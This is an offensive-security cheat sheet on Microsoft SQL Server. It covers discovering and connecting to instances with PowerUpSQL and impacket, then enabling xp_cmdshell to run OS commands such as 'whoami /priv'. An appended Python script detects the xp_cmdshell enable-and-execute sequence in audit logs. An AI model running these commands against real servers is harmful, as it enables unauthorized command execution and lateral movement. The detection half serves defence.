Tags: Authenticated, Lateral Movement, Privilege Escalation
Identify
Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain
Connect - Windows
Get-SQLQuery -Verbose -Instance "host,port" -Username "domain.local\user" -Password "password" -Query 'SELECT @@version'
Connect - Linux
mssqlclient.py DOMAIN/USER@IP -windows-auth
Exploit
Run commands with xp_cmdshell
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami /priv
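A defender-side check to go with the xp_cmdshell section, added here as an example and not part of the original page or of PowerUpSQL/impacket: it scans SQL Server audit records (constructed sample lines with hypothetical logins and addresses; the pipe-separated layout is an assumption) for the sp_configure statement that switches xp_cmdshell on and for the OS commands then run through it, and flags logins that did both in sequence.

```python
import re
from dataclasses import dataclass

# Constructed sample audit records: timestamp|login|client host|statement.
# Logins, addresses and layout are hypothetical, not captured from a real server.
SAMPLE_AUDIT = """\
2024-05-01T10:00:01Z|DOMAIN\\svc_app|10.0.0.5|SELECT @@version
2024-05-01T10:00:09Z|DOMAIN\\svc_app|10.0.0.5|EXEC master.dbo.sp_configure 'show advanced options', 1
2024-05-01T10:00:09Z|DOMAIN\\svc_app|10.0.0.5|RECONFIGURE
2024-05-01T10:00:10Z|DOMAIN\\svc_app|10.0.0.5|EXEC master.dbo.sp_configure 'xp_cmdshell', 1
2024-05-01T10:00:15Z|DOMAIN\\svc_app|10.0.0.5|EXEC master.dbo.xp_cmdshell 'whoami /priv'
2024-05-01T10:05:00Z|DOMAIN\\dba|10.0.0.9|SELECT name FROM sys.databases
"""

# sp_configure 'xp_cmdshell', 1  -> the procedure being switched on
ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.IGNORECASE)
# xp_cmdshell '<command>'        -> an OS command actually being run
EXEC_RE = re.compile(r"\bxp_cmdshell\s+N?'(?P<cmd>[^']*)'", re.IGNORECASE)


@dataclass
class Finding:
    ts: str
    login: str
    host: str
    kind: str    # "enable" or "exec"
    detail: str  # full statement for "enable", the OS command for "exec"


def scan_audit(text: str) -> list[Finding]:
    """Return one Finding per statement that enables or invokes xp_cmdshell."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, login, host, stmt = line.split("|", 3)
        if ENABLE_RE.search(stmt):
            findings.append(Finding(ts, login, host, "enable", stmt))
        elif (m := EXEC_RE.search(stmt)):
            findings.append(Finding(ts, login, host, "exec", m.group("cmd")))
    return findings


def chained_logins(findings: list[Finding]) -> set[str]:
    """Logins that enabled xp_cmdshell and later ran a command through it.
    That is the full sequence the client tooling above produces."""
    enabled, chained = set(), set()
    for f in findings:  # findings are in log order
        if f.kind == "enable":
            enabled.add(f.login)
        elif f.login in enabled:
            chained.add(f.login)
    return chained


if __name__ == "__main__":
    hits = scan_audit(SAMPLE_AUDIT)
    for f in hits:
        print(f"{f.ts} {f.login}@{f.host} {f.kind}: {f.detail}")
    print("enable followed by exec:", sorted(chained_logins(hits)))
```

In production the same two patterns fit a SQL Server Audit or Extended Events feed; a RECONFIGURE right after the sp_configure call is the normal companion and needs no separate rule.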